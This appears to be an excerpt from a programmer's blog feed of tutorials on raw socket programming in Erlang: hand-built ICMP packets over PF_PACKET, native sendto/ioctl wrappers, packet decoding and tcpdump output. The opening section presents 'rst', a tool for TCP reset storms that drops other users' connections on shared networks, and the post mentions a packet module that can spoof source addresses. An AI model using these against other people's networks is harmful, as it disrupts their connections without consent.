tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">41435</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">5591</span> ESTABLISHED
</pre><h1>Resetting Connections</h1><a href="http://en.wikipedia.org/wiki/TCP_reset_attack">TCP reset storms</a> can be used on hubbed networks to bring down other client's TCP connections. I call this peer-to-peer QoS. For comparison, here is another version of <a href="http://github.com/msantos/rst">rst</a> written in C using <a href="http://packetfactory.openwall.net/">libnet</a>. <script src="http://gist.github.com/446057.js?file=rst.erl"></script> <em>rst</em> takes 2 arguments: <ul><li>Device name<br />
<li>IP address to be excluded (to avoid resetting your own connections)<br />
</ul><pre class="Code"><span class="Constant">1</span><span class="Statement">></span> rst:start(<span class="Constant">"eth0"</span>, <span class="Special">{</span><span class="Constant">127</span>,<span class="Constant">0</span>,<span class="Constant">0</span>,<span class="Constant">1</span><span class="Special">}</span>).
</pre><pre class="Code">$ ssh <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>
Read from socket failed: Connection reset by peer
</pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-64693963894364426512010-06-14T19:58:00.001-04:002010-06-25T06:37:03.196-04:00Fun with Raw Sockets in Erlang: Sending ICMP PacketsI've covered pinging other hosts before using <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">the IPPROTO_ICMP protocol and raw sockets</a>, all in Erlang.<br />
<br />
Now I'd like to go through the exercise of sending ICMP echo packets using the Linux PF_PACKET interface. The process is somewhat tedious and complicated, so this post will reflect this, but it should be helpful since documentation for PF_PACKET tends to be a bit sparse.<br />
<br />
Even if you're only interested in the PF_PACKET C interface, this tutorial should be helpful. But you'll have to read a bit and mentally censor the Erlang bits.<br />
<br />
<h1>Erlang Binaries vs C structs</h1>To provide a direct interface to <a href="http://linux.die.net/man/2/sendto">sendto()</a>, I've added an <a href="http://www.erlang.org/doc/man/erl_nif.html">NIF</a> interface for Erlang in <a href="http://github.com/msantos/procket">procket</a>.<br />
<br />
The procket sendto() interface is system dependent, relying on the layout of your computer's <em>struct sockaddr</em>. <em>struct sockaddr</em> is typically constructed as follows:<br />
<pre class="Code"><span class="Type">struct</span> sockaddr {
sa_family_t sa_family; <span class="Comment">/*</span><span class="Comment"> unsigned short int </span><span class="Comment">*/</span>
<span class="Type">char</span> sa_data[<span class="Constant">14</span>]; <span class="Comment">/*</span><span class="Comment"> buffer holding data, dependent on socket type </span><span class="Comment">*/</span>
}
</pre>The data held in the sa_data member of <em>struct sockaddr</em> varies based on the different socket types. For example, for a typical internet socket, a <em>struct sockaddr_in</em> socket address is used:<br />
<pre class="Code"><span class="Type">struct</span> sockaddr_in {
sa_family_t sin_family;
in_port_t sin_port;
<span class="Type">struct</span> in_addr sin_addr;
<span class="Type">char</span> sin_zero[<span class="Constant">8</span>];
}
</pre><em>Of course, these structures will vary by platform</em>. On Linux, aside from a few inscrutable macros, the layout is similar to those shown above. BSD's, such as Mac OS X, add another structure member with the size of the structure:<br />
<pre>u_int8_t sin_len</pre>The appearance and placement of this attribute will cause a lot of portability problems for you if you need to get code running on different OS'es. And it's only natural, since in this tutorial we are bypassing the normal library interfaces.<br />
<br />
So, just remember, PF_PACKET is pretty much a Linux specific interface, so we will be concentrating on the Linux eccentricities.<br />
<br />
<h1>An Erlang Interface to sendto()</h1><br />
According the man page, sendto() takes the following arguments:<br />
<pre class="Code"><span class="Type">ssize_t</span> sendto(
<span class="Type">int</span> s,
<span class="Type">const</span> <span class="Type">void</span> *buf,
<span class="Type">size_t</span> len,
<span class="Type">int</span> flags,
<span class="Type">const</span> <span class="Type">struct</span> sockaddr *to,
socklen_t tolen
)
</pre><ul><li><em>s</em> is the file descriptor, representing the socket returned by open().<br />
<li><em>buf</em> is the payload to be sent in the packet.<br />
<li><em>len</em> is the size of the buffer in bytes.<br />
<li><em>flags</em> is the result of OR'ing together integers which affects the behaviour of the socket. Typically, flags is set to 0.<br />
<li><em>struct sockaddr</em> is a buffer based on the type of socket. It is cast to the "generic" sockaddr structure. Different types of socket addresses are, for example, sockaddr_in for Internet sockets, sockaddr_un for Unix (local) sockets and sockaddr_ll for link layer sockets. We'll be looking at <em>sockaddr_in</em> sockets in this section and <em>sockaddr_ll</em> sockets when investigating sending out packets using the PF_PACKET raw socket interface later on.<br />
</ul>It's worth noting that <pre>sendto(socket, buf, buflen, flags, NULL, 0)</pre>is equivalent to <pre>send()</pre>and <pre>sendto(socket, buf, buflen, 0, NULL, 0)</pre>is equivelent to <pre>write()</pre>With a bit of tweaking (may have to change the procket NIF a bit), we'll be able to use the sendto() to do both send()'s and write()'s in the future (both can be used when the socket has been already been bound using bind()). The procket Erlang sendto/4 interface looks like this: <pre class="Code">sendto(Socket, Packet, Flags, Sockaddr)
</pre>Where: <ul><li><em>Socket</em> is an integer returned from <em>procket:open/1</em> representing the file descriptor.<br />
<li><em>Packet</em> is a binary holding the packet payload.<br />
<li><em>Flags</em> is the result of OR'ing the socket options. See the <a href="http://linux.die.net/man/2/sendto">sendto()</a> man page for the possible parameters.<br />
<li><em>Sockaddr</em> is an Erlang binary representation of the <em>sockaddr</em> structure for the type of socket in use.<br />
</ul><h1>An Example of Using <em>sendto/4</em></h1>In the original example of sending an <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">ICMP echo packet from Erlang</a>, we (mis-)used <a href="http://www.erlang.org/doc/man/gen_udp.html">gen_udp</a> to send and receive ICMP packets. Here is an example of sending ICMP packets using the sendto/4 NIF: <script src="http://gist.github.com/438473.js?file=icmp2.erl"></script> To send the ICMP packet using sendto/4, we must create the <em>struct sockaddr_in</em> as an Erlang binary. In <em>linux/in.h</em>, the structure is defined as: <pre class="Code"><span class="Type">struct</span> sockaddr_in {
sa_family_t sin_family; <span class="Comment">/*</span><span class="Comment"> Address family: 2 bytes </span><span class="Comment">*/</span>
in_port_t sin_port; <span class="Comment">/*</span><span class="Comment"> Port number: 2 bytes </span><span class="Comment">*/</span>
<span class="Type">struct</span> in_addr sin_addr; <span class="Comment">/*</span><span class="Comment"> Internet address: 4 bytes </span><span class="Comment">*/</span>
<span class="Comment">/*</span><span class="Comment"> Pad to size of `struct sockaddr'. </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">char</span> sin_zero[<span class="Constant">8</span>];
};
</pre>Both sa_family_t and in_port_t are 2 bytes. The total size of the struct is 16 bytes. The Erlang binary used to represent this is: <pre class="Code"><span class="Statement"><<</span>
?<span class="Identifier">PF_INET:16</span><span class="Statement">/</span>native, <span class="Comment">% sin_family</span>
<span class="Identifier">0:16</span>, <span class="Comment">% sin_port</span>
<span class="Identifier">IP1:8</span>, <span class="Identifier">IP2:8</span>, <span class="Identifier">IP3:8</span>, <span class="Identifier">IP4:8</span>, <span class="Comment">% sin_addr</span>
<span class="Identifier">0:64</span> <span class="Comment">% sin_zero</span>
<span class="Statement">>></span>
</pre><ul><li>The value of the PF_INET macro (or 2) is taken from <em>bits/socket.h</em>. The value of the different PF_* macros is always in native endian format.<br />
<li>Since we are sending an ICMP packet, the port has no meaning and is set to 0.<br />
<li><em>IP1</em> through <em>IP4</em> refer to the components of an IPv4 address, represented in Erlang as a 4-tuple of bytes such as {192,168,10,1}.<br />
<li>The sin_zero member is always set to 8 zero'ed bytes.<br />
</ul>The corresponding NIF function can be found in <a href="http://github.com/msantos/procket/blob/master/c_src/procket.c#L">procket.c</a>: <pre class="Code" ><span class="Type">static</span> ERL_NIF_TERM
nif_sendto(ErlNifEnv *env, <span class="Type">int</span> argc, <span class="Type">const</span> ERL_NIF_TERM argv[])
{
<span class="Type">int</span> sockfd = -<span class="Constant">1</span>;
<span class="Type">int</span> flags = <span class="Constant">0</span>;
ErlNifBinary buf;
ErlNifBinary sa;
<span class="Statement">if</span> (!enif_get_int(env, argv[<span class="Constant">0</span>], &sockfd))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_inspect_binary(env, argv[<span class="Constant">1</span>], &buf))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_get_int(env, argv[<span class="Constant">2</span>], &flags))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_inspect_binary(env, argv[<span class="Constant">3</span>], &sa))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (sendto(sockfd, buf.data, buf.size, flags, (<span class="Type">struct</span> sockaddr *)sa.data, sa.size) == -<span class="Constant">1</span>)
<span class="Statement">return</span> enif_make_tuple(env, <span class="Constant">2</span>,
atom_error,
enif_make_tuple(env, <span class="Constant">2</span>,
enif_make_int(env, errno),
enif_make_string(env, strerror(errno), ERL_NIF_LATIN1)));
<span class="Statement">return</span> atom_ok;
}
</pre>The nif_sendto() function takes the Erlang binary and casts it to a sockaddr structure. <h1>Tedium, or the Perils of Constructing Packets by Hand</h1>When requesting a file descriptor using socket(), the PF_PACKET interface allows the user to construct either whole ethernet frames (using the SOCK_RAW type) or cooked packets to which the kernel will prepend ethernet headers (using the SOCK_DGRAM type). I had some problems with SOCK_DGRAM packets which I'll probably talk about in another blog post. But for now, I'll describe how to create ICMP echo packets using the PF_PACKET SOCK_RAW type. To get a file descriptor with the appropriate settings from procket: <pre class="Code">{ok, FD} <span class="Statement">=</span> <span class="Identifier">procket:listen</span>(<span class="Constant">0</span>, [{protocol, <span class="Constant">16</span>#<span class="Constant">0008</span>}, {type, raw}, {family, packet}])
</pre>Notice that, since I'm on a little endian platform, I byte swapped the defintion of ETH_P_IP to big endian format. <h2>Retrieving the Interface Index</h2>To figure out the index of our interface, we need to call an ioctl(). Conveniently, procket provides an NIF ioctl() interface. The C ioctl() interface is defined as: <pre class="Code"><span class="Type">int</span> ioctl(<span class="Type">int</span> d, <span class="Type">int</span> request, ...);
</pre><ul><li><em>d</em> is the file descriptor.<br />
<li><em>request</em> is an integer representing a device dependent instruction.<br />
<li>The remaining argument to ioctl() is usually a buffer holding a device dependent structure. In this case, we will pass an <em>ifreq</em> structure. The buffer acts as both the input and output for the ioctl.<br />
</ul><em>struct ifreq</em>, as defined in net/if.h, is composed of 2 unions. <pre class="Code"><span class="Type">struct</span> ifreq
{
<span class="PreProc"># define IFHWADDRLEN </span><span class="Constant">6</span>
<span class="PreProc"># define IFNAMSIZ IF_NAMESIZE</span>
<span class="Type">union</span>
{
<span class="Type">char</span> ifrn_name[IFNAMSIZ]; <span class="Comment">/*</span><span class="Comment"> Interface name, e.g. "en0". </span><span class="Comment">*/</span>
} ifr_ifrn;
<span class="Type">union</span>
{
<span class="Type">struct</span> sockaddr ifru_addr;
<span class="Type">struct</span> sockaddr ifru_dstaddr;
<span class="Type">struct</span> sockaddr ifru_broadaddr;
<span class="Type">struct</span> sockaddr ifru_netmask;
<span class="Type">struct</span> sockaddr ifru_hwaddr;
<span class="Type">short</span> <span class="Type">int</span> ifru_flags;
<span class="Type">int</span> ifru_ivalue;
<span class="Type">int</span> ifru_mtu;
<span class="Type">struct</span> ifmap ifru_map;
<span class="Type">char</span> ifru_slave[IFNAMSIZ]; <span class="Comment">/*</span><span class="Comment"> Just fits the size </span><span class="Comment">*/</span>
<span class="Type">char</span> ifru_newname[IFNAMSIZ];
__caddr_t ifru_data;
} ifr_ifru;
};
</pre>But to get the interface index, we're only interested in these struct members: <pre class="Code"><span class="Type">struct</span> ifreq {
<span class="Type">char</span> ifrn_name[<span class="Constant">16</span>];
<span class="Type">int</span> ifr_ifindex;
}
<span class="PreProc"># define ifr_name ifr_ifrn.ifrn_name </span><span class="Comment">/*</span><span class="Comment"> interface name </span><span class="Comment">*/</span>
<span class="PreProc"># define ifr_ifindex ifr_ifru.ifru_ivalue </span><span class="Comment">/*</span><span class="Comment"> interface index </span><span class="Comment">*/</span>
</pre>In Erlang terms, we can pass in the full 32 byte structure (only 4 bytes of the second union is actually used). On input, if we are interested in using the "eth0" interface: <pre class="Code"><span class="Statement"><<</span>
<span class="Constant">"eth0"</span>, <span class="Identifier">96:0</span>, <span class="Comment">% ifrn_name, 16 bytes</span>
<span class="Identifier">0:128</span> <span class="Comment">% ifr_ifru union for the response, 16 bytes</span>
<span class="Statement">>></span>
</pre>On output: <pre class="Code"><span class="Statement"><<</span>
<span class="Constant">"eth0"</span>, <span class="Identifier">96:0</span>, <span class="Comment">% ifrn_name, 16 bytes</span>
<span class="Identifier">Ifr:32</span>, <span class="Comment">% interface index</span>
<span class="Identifier">0:96</span> <span class="Comment">% unused</span>
<span class="Statement">>></span>
</pre>So, to retrieve the value in Erlang: <pre class="Code">{ok, <span class="Statement"><<</span><span class="Identifier">_Ifname:16</span><span class="Statement">/</span>bytes, <span class="Identifier">Ifr:32</span>, _<span class="Statement">/</span><span class="Identifier">binary</span><span class="Statement">>></span>} <span class="Statement">=</span> <span class="Identifier">procket:ioctl</span>(S,
?SIOCGIFINDEX,
<span class="Identifier">list_to_binary</span>([
Dev, <span class="Statement"><<</span><span class="Constant">0</span><span class="Special">:</span>((<span class="Constant">16</span><span class="Statement">*</span><span class="Constant">8</span>) <span class="Statement">-</span> (<span class="Identifier">length</span>(Dev)<span class="Statement">*</span><span class="Constant">8</span>)), <span class="Identifier">0:128</span><span class="Statement">>></span>
])),
</pre><ul><li><em>Dev</em> is a list holding the device name, such as "eth0" or "ath0".<br />
<li><em>Ifr</em> is the part of the binary holding the interface index returned by the ioctl().<br />
</ul>The corresponding NIF function can be found in <a href="http://github.com/msantos/procket/blob/master/c_src/procket.c#L239">procket.c</a>: <pre class="Code"><span class="Type">static</span> ERL_NIF_TERM
nif_ioctl(ErlNifEnv *env, <span class="Type">int</span> argc, <span class="Type">const</span> ERL_NIF_TERM argv[])
{
<span class="Type">int</span> s = -<span class="Constant">1</span>;
<span class="Type">int</span> req = <span class="Constant">0</span>;
ErlNifBinary ifr;
<span class="Statement">if</span> (!enif_get_int(env, argv[<span class="Constant">0</span>], &s))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_get_int(env, argv[<span class="Constant">1</span>], &req))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_inspect_binary(env, argv[<span class="Constant">2</span>], &ifr))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (!enif_realloc_binary(env, &ifr, ifr.size))
<span class="Statement">return</span> enif_make_badarg(env);
<span class="Statement">if</span> (ioctl(s, req, ifr.data) < <span class="Constant">0</span>)
<span class="Statement">return</span> error_tuple(env, strerror(errno));
<span class="Statement">return</span> enif_make_tuple(env, <span class="Constant">2</span>,
atom_ok,
enif_make_binary(env, &ifr));
}
</pre>The nif_ioctl() function takes, as arguments, the socket descriptor and a binary buffer representing the ifreq structure. The binary is made writable, passed to ioctl() and returned to the caller. <h2>Preparing the ICMP Packet</h2>Unlike the other examples of sending an ICMP packet, we'll need to prepare more than the ICMP header and payload. Because we are sending directly out on the interface, we have to add the ethernet and IPv4 header. <h3>Ethernet Header</h3>The ethernet header is composed of 6 bytes each for the destination and source MAC addresses and two bytes for the ethernet type. <div><ul class="Message"><li class="Message">Destination MAC Address:48</li>
<li class="Message">Source MAC Address:48</li>
<li class="Message">Type:16</li>
</ul></div>The list of ethernet types can be found in <em>linux/if_ether.h</em>. The Erlang specification for this message format would be (assuming the destination mac address is 00:aa:bb:cc:dd:ee and the source mac address is 00:11:22:33:44:55): <pre class="Code"><span class="Statement"><<</span>
<span class="Constant">16</span>#<span class="Constant">00</span>, <span class="Constant">16</span>#<span class="Constant">aa</span><span class="Special">:</span> <span class="Constant">16</span>#<span class="Constant">bb</span>, <span class="Constant">16</span>#<span class="Constant">cc</span>, <span class="Constant">16</span>#<span class="Constant">dd</span>, <span class="Constant">16</span>#<span class="Constant">ee</span>, <span class="Comment">% destination MAC address</span>
<span class="Constant">16</span>#<span class="Constant">00</span>, <span class="Constant">16</span>#<span class="Constant">11</span><span class="Special">:</span> <span class="Constant">16</span>#<span class="Constant">22</span>, <span class="Constant">16</span>#<span class="Constant">33</span>, <span class="Constant">16</span>#<span class="Constant">44</span>, <span class="Constant">16</span>#<span class="Constant">55</span>, <span class="Comment">% source MAC address</span>
<span class="Constant">16</span>#<span class="Constant">08</span>, <span class="Constant">16</span>#<span class="Constant">00</span> <span class="Comment">% type: ETH_P_IP</span>
<span class="Statement">>></span>
</pre><h3>IPv4 Header</h3>The IPv4 header is: <div><ul class="Message"><li class="Message">Version:4</li>
<li class="Message">IHL:4</li>
<li class="Message">ToS:8</li>
<li class="Message">Total Length:16</li>
<li class="Message">Identification:16</li>
<li class="Message">Flags:3</li>
<li class="Message">Fragment Offset:13</li>
<li class="Message">Time to Live:8</li>
<li class="Message">Protocol:8</li>
<li class="Message">Checksum:16</li>
<li class="Message">Source Address:32</li>
<li class="Message">Destination Address:32</li>
</ul></div>I won't bother to explain each field. See <a href="http://www.faqs.org/rfcs/rfc791.html">RFC 791</a> for details. Constructing an Erlang IPv4 header involves declaring the header once with the checksum field set to zero, performing a checksum on the header, then incorporating the checksum in the 2 byte checksum field. <pre class="Code">IPv4 <span class="Statement">=</span> <span class="Statement"><<</span>
<span class="Identifier">4:4</span>, <span class="Identifier">5:4</span>, <span class="Identifier">0:8</span>, <span class="Identifier">84:16</span>,
<span class="Identifier">Id:16</span>, <span class="Identifier">0:1</span>, <span class="Identifier">1:1</span>, <span class="Identifier">0:1</span>,
<span class="Identifier">0:13</span>, <span class="Identifier">TTL:8</span>, ?<span class="Identifier">IPPROTO_ICMP:8</span>, <span class="Identifier">0:16</span>,
<span class="Identifier">SA1:8</span>, <span class="Identifier">SA2:8</span>, <span class="Identifier">SA3:8</span>, <span class="Identifier">SA4:8</span>,
<span class="Identifier">DA1:8</span>, <span class="Identifier">DA2:8</span>, <span class="Identifier">DA3:8</span>, <span class="Identifier">DA4:8</span>
<span class="Statement">>></span><span class="Special">.</span>
</pre><ul><li><em>Id</em> is a hint for reconstructing fragmented packets by the receiving host.<br />
<li><em>IPPROTO_ICMP</em> is a macro set to 1. The value is defined in <em>netinet/in.h</em>. <br />
<li>The checksum field is set to 0 for checksumming purposes. After the checksum has been calculated, the resulting value is placed in this field.<br />
<li>The <em>TTL</em> is set to 64. Packets with a time to live of 0 are discarded.<br />
<li><em>SA1</em> to <em>SA4</em> are the bytes representing the IPv4 source address.<br />
<li><em>DA1</em> to <em>DA4</em> are the bytes representing the IPv4 destination address.<br />
</ul><h3>ICMP Header</h3>I won't go over <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">constructing the ICMP header</a>, since it's been covered here. <h2>Finally Sending the Packet</h2>We have a raw PF_PACKET socket, the index of the interface to use the sendto() operation and a binary representing the ICMP packet and payload. We have the pieces in place now to send out the ping. We could bind() the interface and then use write() or send() to push out packets. In this example, we'll specify the link layer socket address structure holding the routing information for each packet. <pre class="Code"><span class="Type">struct</span> sockaddr_ll {
<span class="Type">unsigned</span> <span class="Type">short</span> sll_family; <span class="Comment">/*</span><span class="Comment"> Always AF_PACKET </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">short</span> sll_protocol; <span class="Comment">/*</span><span class="Comment"> Physical layer protocol </span><span class="Comment">*/</span>
<span class="Type">int</span> sll_ifindex; <span class="Comment">/*</span><span class="Comment"> Interface number </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">short</span> sll_hatype; <span class="Comment">/*</span><span class="Comment"> Header type </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">char</span> sll_pkttype; <span class="Comment">/*</span><span class="Comment"> Packet type </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">char</span> sll_halen; <span class="Comment">/*</span><span class="Comment"> Length of address </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">char</span> sll_addr[<span class="Constant">8</span>]; <span class="Comment">/*</span><span class="Comment"> Physical layer address </span><span class="Comment">*/</span>
};
</pre><ul><li><em>sll_family</em> is, as the comment says, always PF_PACKET in host endian format.<br />
<li><em>sll_protocol</em> is usually either ETH_P_ALL or ETH_P_IP. It is passed in big endian format but is defined in the header file in host endian format. For many linux installs, this will be little endian, so it will need to be byte swapped.<br />
<li><em>sll_halen</em> is the length of the physical layer address. Although there are up to 8 bytes allowed for for the physical layer address, only 6 bytes are used for ethernet.<br />
</ul><pre class="Code"><span class="Statement"><<</span>
?<span class="Identifier">PF_PACKET:16</span><span class="Statement">/</span>native, <span class="Comment">% sll_family: PF_PACKET</span>
<span class="Constant">16</span>#<span class="Constant">0</span><span class="Special">:</span><span class="Constant">16</span>, <span class="Comment">% sll_protocol: Physical layer protocol, big endian</span>
<span class="Identifier">Interface:32</span><span class="Statement">/</span>native, <span class="Comment">% sll_ifindex: Interface number</span>
<span class="Identifier">0:16</span>, <span class="Comment">% sll_hatype: Header type</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_pkttype: Packet type</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_halen: address length</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span>, <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Identifier">0:8</span> <span class="Comment">% sll_addr[8]: physical layer address</span>
<span class="Statement">>></span>
</pre>From trial and error, only sll_ifindex needs to be set. Even the sll_family does not seem be required in this context, although the man page suggests it is required. (sll_halen and sll_addr values would otherwise be set to 6 for sll_halen and the first 6 bytes of sll_addr to the MAC address of the destination ethernet device.) The source and destination appear to be read directly from the ethernet header. <script src="http://gist.github.com/438488.js?file=pkt.erl"></script> The pkt module will construct an ethernet frame and send it on the network. The function interface is a bit cumbersome, forcing you to specify the MAC and IP address of both the source and destination, but allows spoofing packets from different IP/MAC combinations. <pre class="Code"><span class="Identifier">pkt:ping</span>(
{<span class="Constant">"eth0"</span>, {<span class="Constant">16</span>#<span class="Constant">00</span>,<span class="Constant">16</span>#<span class="Constant">11</span>,<span class="Constant">16</span>#<span class="Constant">22</span>,<span class="Constant">16</span>#<span class="Constant">33</span>,<span class="Constant">16</span>#<span class="Constant">44</span>,<span class="Constant">16</span>#<span class="Constant">55</span>}, {<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">213</span>}},
{{<span class="Constant">16</span>#<span class="Constant">00</span>,<span class="Constant">16</span>#<span class="Constant">aa</span>,<span class="Constant">16</span>#<span class="Constant">bb</span>,<span class="Constant">16</span>#<span class="Constant">cc</span>,<span class="Constant">16</span>#<span class="Constant">dd</span>,<span class="Constant">16</span>#<span class="Constant">ee</span>}, {<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">1</span>}}
)<span class="Special">.</span>
</pre>The first argument is a 3-tuple representing the network interface, source MAC and IP address. The second argument is a 2-tuple representing the destination MAC and IP address. Looking at the output from tcpdump: <pre class="Code"># tcpdump -n -s 0 -XX -i ath0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ath0, link-type EN10MB (Ethernet), capture size 65535 bytes
18:58:40.077600 IP 192.168.213.213 > 192.168.213.1: ICMP echo request, id 7338, seq 0, length 64
0x0000: 0011 2233 4455 00aa bbcc ddee 0800 4500 ....>....Y.&..E.
0x0010: 0054 1caa 4000 4001 f1d6 c0a8 d5d5 c0a8 .T..@.@.........
0x0020: d501 0800 ea06 1caa 0000 0000 04fc 0007 ................
0x0030: 2ba0 0001 2e02 2021 2223 2425 2627 2829 +......!"#$%&'()
0x0040: 2a2b 2c2d 2e2f 3031 3233 3435 3637 3839 *+,-./0123456789
0x0050: 3a3b 3c3d 3e3f 4041 4243 4445 4647 4849 :;<=>?@ABCDEFGHI
0x0060: 4a4b JK
18:58:40.078464 IP 192.168.213.1 > 192.168.213.213: ICMP echo reply, id 7338, seq 0, length 64
0x0000: 00aa bbcc ddee 0011 2233 4455 0800 4500 ...Y.&....>...E.
0x0010: 0054 86ee 0000 4001 c792 c0a8 d501 c0a8 .T....@.........
0x0020: d5d5 0000 f206 1caa 0000 0000 04fc 0007 ................
0x0030: 2ba0 0001 2e02 2021 2223 2425 2627 2829 +......!"#$%&'()
0x0040: 2a2b 2c2d 2e2f 3031 3233 3435 3637 3839 *+,-./0123456789
0x0050: 3a3b 3c3d 3e3f 4041 4243 4445 4647 4849 :;<=>?@ABCDEFGHI
0x0060: 4a4b JK
</pre>Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-8577871288924093307.post-31530310627425941732010-06-04T13:20:00.000-04:002010-06-19T19:31:59.616-04:00Fun with Raw Sockets in Erlang: Decoding PacketsReading from the <a href="http://blog.listincomprehension.com/2010/05/raw-socket-programming-in-erlang.html">network using PF_PACKET</a> will return the packets as binary data.<br />
<br />
Parsing the packet is easy to do using Erlang's pattern matching. <a href="http://github.com/msantos/epcap/blob/master/src/epcap_net.erl">epcap</a> has some functions to convert the binaries into records. We can use the same functions to decapsulate packets returned from <a href="http://github.com/msantos/procket">procket</a>.<br />
<br />
For example, here is the output from a ping:<br />
<pre class="Code"><span class="Statement">=</span>INFO REPORT<span class="Statement">====</span> <span class="Constant">4</span><span class="Statement">-</span>Jun<span class="Statement">-</span><span class="Constant">2010</span><span class="Special">::</span><span class="Identifier">12:50</span><span class="Special">:</span><span class="Constant">55</span> <span class="Statement">===</span>
source_macaddr<span class="Special">:</span> <span class="Constant">"0:15:AF:xx:xx:xx"</span>
source_address<span class="Special">:</span> {<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">213</span>}
source_port<span class="Special">:</span> []
destination_macaddr<span class="Special">:</span> <span class="Constant">"0:16:B6:xx:xx:xx"</span>
destination_address<span class="Special">:</span> {<span class="Constant">67</span>,<span class="Constant">195</span>,<span class="Constant">160</span>,<span class="Constant">76</span>}
destination_port<span class="Special">:</span> []
<span class="Identifier">protocol: icmp</span>
protocol_header<span class="Special">:</span> [{type,<span class="Constant">8</span>},{code,<span class="Constant">0</span>}]
<span class="Identifier">payload_bytes: 56</span>
payload<span class="Special">:</span> <span class="Constant">"...L............................ !\"#$%&'()*+,-./01234567"</span>
</pre>The code is a modified version of <a href="http://github.com/msantos/epcap/blob/master/src/sniff.erl">sniff</a> that is distributed with <a href="http://github.com/msantos/epcap">epcap</a>. To compile the code, you'll need a copy of <a href="http://github.com/msantos/epcap/blob/master/include/epcap_net.hrl">epcap_net.hrl</a> and to run it, both the procket and epcap beam files will have to be in your path. Using the "-pa" option, something like: <pre>erl -pa /path/to/procket/ebin -pa /patch/to/epcap/ebin</pre><script src="http://gist.github.com/425677.js?file=packet.erl"></script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-17065862270253554712010-05-29T13:09:00.000-04:002010-06-19T19:32:17.055-04:00Raw Socket Programming in Erlang: Reading Packets Using PF_PACKETBSD has <a href="http://en.wikipedia.org/wiki/Berkeley_Packet_Filter">BPF</a>, Solaris has <a href="http://en.wikipedia.org/wiki/DLPI">DLPI</a> and Linux, well, has had many interfaces. The latest uses a linux specific protocol family, PF_PACKET. PF_PACKET can receive whole packets from the network as well as generate them, like a combination of BPF and the BSD raw socket interface.<br />
<br />
<a href="http://en.wikipedia.org/wiki/Pcap">PCAP</a> is an abstraction over these different interfaces. <a href="http://blog.listincomprehension.com/2009/12/epcap-erlang-packet-sniffer.html">epcap</a> uses a system process linked to the PCAP library to read ethernet frames and send them as messages into Erlang using the port interface. Using <a href="http://github.com/msantos/procket">procket</a> with the PF_PACKET socket option, I've been playing with reading packets directly off the network and generating them as well.<br />
<br />
The PF_PACKET interface is used by passing options to <a href="http://linux.die.net/man/7/socket">socket()</a>.<br />
<pre class="Code"><span class="Type">int</span> socket(<span class="Type">int</span> domain, <span class="Type">int</span> type, <span class="Type">int</span> protocol);
</pre><ul><li>The protocol <i>family</i> is, of course, <b>PF_PACKET</b>.<br />
<li>The <i>type</i> may be either <b>SOCK_RAW</b> or <b>SOCK_DGRAM</b>. SOCK_RAW will return the whole packet, including the ethernet header. A process sending a packet must prepend a link layer header. A socket with type SOCK_DGRAM will strip off the link layer header and generate a valid header for outgoing packets.<br />
<li>The <i>protocol</i> is selected from one of the values in <a href="http://lxr.free-electrons.com/source/include/linux/if_ether.h?v=2.6.24">linux/if_ether.h</a>.<br />
<pre>#define ETH_P_IP 0x0800
#define ETH_P_ALL 0x0003
</pre><b>ETH_P_ALL</b> will retrieve all network packets and <b>ETH_P_IP</b> just the IP packets. The values are in <i>host-endian format</i> and will need to be converted to network byte order before being used as arguments to socket().<br />
